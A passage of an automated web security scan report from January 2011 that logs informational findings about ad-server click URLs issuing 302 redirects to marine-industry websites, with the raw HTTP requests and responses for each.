http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:24:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

